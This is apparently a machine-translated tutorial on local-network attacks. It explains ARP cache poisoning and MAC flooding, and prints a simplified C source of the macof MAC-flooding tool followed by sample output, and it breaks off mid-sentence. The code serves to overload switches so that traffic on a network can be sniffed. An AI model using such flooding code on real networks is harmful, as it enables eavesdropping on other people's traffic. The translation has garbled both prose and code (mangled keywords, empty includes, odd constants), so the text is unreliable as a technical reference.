Tactical Attack Defense-close combat (ARP) Attacks

In the Internet era, hackers are a group of mysterious people in our lives. Legend has it that they are arrogant, advocating themselves and acting strangely, stirring the lifeblood of the entire network and making them alive. In reality, however, they live beyond our boundaries. Imagine that in a busy Office, every employee is immersed in his/her own affairs in a narrow workspace; the voice that can be heard is the heartbeat of fingers waving on the keyboard and the one-on-the-other phone rings. Who notices that the narrow personal space is beyond the ordinary imagination. Fast fingers, various commands and Operational Program queues parade. On the surface, everything seems normal. However, there may be intense electronic confrontation .......

SANS announced that 2001 of internal intrusion attacks only account for about 30% of the attacks, but they are also the most harmful. Therefore, local area network intrusion and penetration are more practical. The various attack methods produced by exploiting the ARP vulnerability on the L2 link are undoubtedly the most exquisite stunt of the local network war.

I. Basic Knowledge preparation

Behind the exquisite program are simple principles and intelligent intelligence. In order to smoothly elaborate on ARP protocol vulnerabilities and the various ARP attack ideas that will be elaborated later (at the same time, I must take into account the friends who first came into contact with the network, as a result, we will give a rough overview of the ARP Protocol and related network link layer concepts.

Address Resolution Protocol (ARP) is used to bind the hardware Address and IP Address of an Ethernet card. When there is a communication requirement between hosts, ARP establishes a communication connection between hosts through broadcast requests/unicast responses. You are familiar with 32-bit IP addresses. In an Ethernet LAN, the IP address of the NIC device is 48-bit (also known as the MAC address ). A form called ARP cache is used to maintain the correlation between MAC addresses and their corresponding IP addresses. ARP provides protocol rules for address translation between network devices and for creating MAC-IP correlations.

Principles for establishing communication relationships at the network link layer: network host A wants to establish A communication connection with network host C. host a broadcasts arp request packets (requests) in the network:

Host A wants to communicate with the target host whose IP address is 192.168.1.3, the sent broadcast package contains its own IP address, the MAC address of the NIC, the IP address of the target host, and the broadcast MAC address (FF-FF-FF-FF-FF-FF ).

(Note: the Mac address is the address used on the media access layer. The intuitive concept is the physical address of the NIC. Generally, the Mac address uses 6-byte 48bit .)

When host C receives the REQUEST broadcast packet of ARP, it finds that the IP address in the target address is the same as its own IP address, receives the data REQUEST, and responds.

From figure 2, we can see that host C finds that the ARP request of master A meets the requirements, add the IP-MAC bound image record of host A in its ARP cache table, and send the unicast ARP response packet (RELAY) concurrently) to host. Host A receives response packets, updates its ARP cache table records, and binds the IP-MAC image records of host C. Now, the L2 communication relationship is established. This request packet is ignored by other hosts on the network.

This relationship can be similar to scenario-based session failover.

Host A: Hi, who has the IP address 192.168.1.3?

Host B: Hi, my host address is 192.168.1.3, and my house number is 00-50-56-C0-08. Remember to come to me.

Other hosts: NO. This is not my IP address.

According to the principle analysis, ARP itself is a non-class protocol and cannot carry any status information. Therefore, ARP cannot perform any authentication, which leads to the security threat of the Protocol itself. The Historical Cause of this security threat is that earlier network creators designed ARP in a peaceful and free environment. Therefore, security problems were almost trivial at the time. However, the rise in network agglomeration and destructive attacks and intrusion events make ARP Protocol vulnerable.

After understanding the working principle of ARP, we can conclude that the ARP cache list in most network systems dynamically increases or updates the IP-MAC ing records in the cache table based on the received arp replay packets. Based on such a simple rule, we will see various brilliant intrusion and attack techniques.
 

Ii. Attack Classification

◆ ARP cache poisoning

This is a very interesting title-"poisoning", which reminds me of the moldy green air and the rusty red river. After all, is the ecological environment of the Earth region worrying ?.

The essence of ARP cache poisoning is not as terrible as the literal meaning. Remember the concept of the previously improved ARP cache table. In fact, each network device has an APR table, which temporarily records the matched device MAC and IP address ing pairs. It ensures that these records are unique, that is, an IP is mapped to only one MAC. ARP itself does not have a authentication and trust mechanism, so spoofing behavior becomes rampant. When a network device sends an arp request, it fully believes that the arp reply response comes from the correct device because it cannot verify whether the response packet is exactly sent from the correct device. Even worse, many operating systems directly acknowledge ARP response packets sent by other devices without sending arp request packets.

In this way, the design of the spam method changes the intrusion, but the defense is helpless. If I am a black hat, I know that ARP does not validate, and the system can receive ARP response packets without sending request packets. What will I do? Create a seemingly valid arp reply packet, which spoofs the desired MAC address and IP address and sends it to the host system that blindly receives such packets. As a result, this method spoofs the host so that it updates the MAC-IP address ing pair that I want. Of course, I can freely broadcast this ARP REPLY packet to fool all hosts in the network system (? Cold ).

Now you know a small ARP trick. We call it ARP cache poisoning. It is through it that countless inventions have been created, just as the invention of the wheel can be comparable to the invention of the moon landing, a simple invention can jump to the Earth.

◆ MAC flood attack (Flooding)

Most of the current network structures use the Switched structure to replace the previous Broadcast. This advantage is that the switch does not push Broadcast storms to every port, it intelligently identifies the port that needs to push data, which makes the layer snffer that is connected in the HUB mode feel overwhelmed.

However, the power of Progress sometimes makes "security" very delicate. The Port security feature of a vswitch consumes some CPU resources. When the switching process exceeds the load, the vswitch cannot handle Port security. In this case, the vswitch is in the HUB mode, data is simply broadcast to each computer on the network, so the eavesdropping activity can continue. Therefore, a large number of forged arp request packets are used to conduct flood attacks on the switch's ARP table (a typical application of ARP cache table poisoning ), it can easily overload Switches of many manufacturers (CISCO 1900 and 3COM superstackII are vulnerable to attacks). At this moment, switches work in a similar way to the HUB, so you can easily use the packet sniffer to probe the entire network.

The macof applet easily implements this function, and its code implementation is as follows:
--------------- Snip -------------------
# Include "config. h"
# Include

# Include
# Include
# Include
# Include
# Include
# Include

# Include "version. h"

Extern char * ether_ntoa (struct ether_addr *);
Extern struct ether_addr * ether_aton (char *);

In_addr_t Src = 0;
In_addr_t Dst = 0;
U_char * Tha = NULL;
U_short Dport = 0;
U_short Sport = 0;
Char * Intf = NULL;
Int Repeat =-1; // causes an infinite loop of forged MAC

Void usage (void ){
Fprintf (stderr, "Version:" VERSION ""
"Usage: macof ");
Exit (1 );
}
Void gen_mac (u_char * mac ){
// Generate a random MAC address
* (In_addr_t *) mac) = libnet_get_prand (PRu32 );
* (U_short *) (mac + 4) = libnet_get_prand (pr2010 );
}
Int main (int argc, char * argv []) {
Int c, I;
Struct libnet_link_int * llif;
Char ebuf [PCAP_ERRBUF_SIZE];
U_char sha [ETHER_ADDR_LEN], tha [ETHER_ADDR_LEN];
In_addr_t src, dst;
U_short sport, dport;
U_int32_t seq;
U_char pkt [ETH_H + IP_H + TCP_H];
If (! Intf & (Intf = pcap_lookupdev (ebuf) = NULL)
Errx (1, "% s", ebuf );
If (llif = libnet_open_link_interface (Intf, ebuf) = 0)
Errx (1, "% s", ebuf );
Libnet_seed_prand ();
For (I = 0; I! = Repeat; I ++ ){
Gen_mac (sha );
Gen_mac (tha );
Src = libnet_get_prand (PRu32 );
Dst = libnet_get_prand (PRu32 );
Sport = libnet_get_prand (pr2010 );
Dport = libnet_get_prand (pr2010 );
Seq = libnet_get_prand (PRu32 );
// Forge a seemingly valid MAC address
Libnet_build_ethernet (tha, sha, ETHERTYPE_IP, NULL, 0, pkt );
Libnet_build_ip (TCP_H, 0, libnet_get_prand (pr2010), 0, 64,
IPPROTO_TCP, src, dst, NULL, 0, pkt + ETH_H );
Libnet_build_tcp (sport, dport, seq, 0, TH_SYN, 512,
0, NULL, 0, pkt + ETH_H + IP_H );
Libnet_do_checksum (pkt + ETH_H, IPPROTO_IP, IP_H );
Libnet_do_checksum (pkt + ETH_H, IPPROTO_TCP, TCP_H );
If (libnet_write_link_layer (llif, Intf, pkt, sizeof (pkt) <0)
Errx (1, "write ");
Fprintf (stderr, "% s ",
"Source MAC address:" ether_ntoa (struct ether_addr *) sha ));
Fprintf (stderr, "% s: % d> % s: % d ",
"Target MAC address:" ether_ntoa (struct ether_addr *) tha ),
"Source IP Address/port:" libnet_host_lookup (Src, 0), sport,
"Target IP Address/port:" libnet_host_lookup (Dst, 0), dport );
}
Exit (0 );
}
----------------- Snip end -----------------------------
 

/* The author of this program is Dug Songdugsong@m.org, because here only need to achieve mac flooding attack, so I have simplified the program, so that readers can intuitively understand the MAC FLOODING Attack principle. In addition, macof was first written by Ian Vitek using Perl */

# Macof Testing
[Root @ hackersvr/] # macof
 

Source MAC address: 77: 6b: e1: 6e: 5e: 8c target MAC address: 93: 2d: ed: 45: f9: e3

Source IP Address/port: 0.0.0.0: 45702 target IP Address/port 0.0.0.0: 11000

Source MAC address: 84: a4: d3: 57: ef: 8 Target MAC address: 12: 56: 52: 42: dc: 95

Source IP Address/port: 0.0.0.0: 16630 target IP Address/port 0.0.0.0: 3031

Source MAC address: f0: 9: 3f: 18: 89 target MAC address: 1d: 86: 53: 53: d7: f8

Source IP Address/port: 0.0.0.0: 15535 target IP Address/port: 0.0.0.0: 7466 ............

This program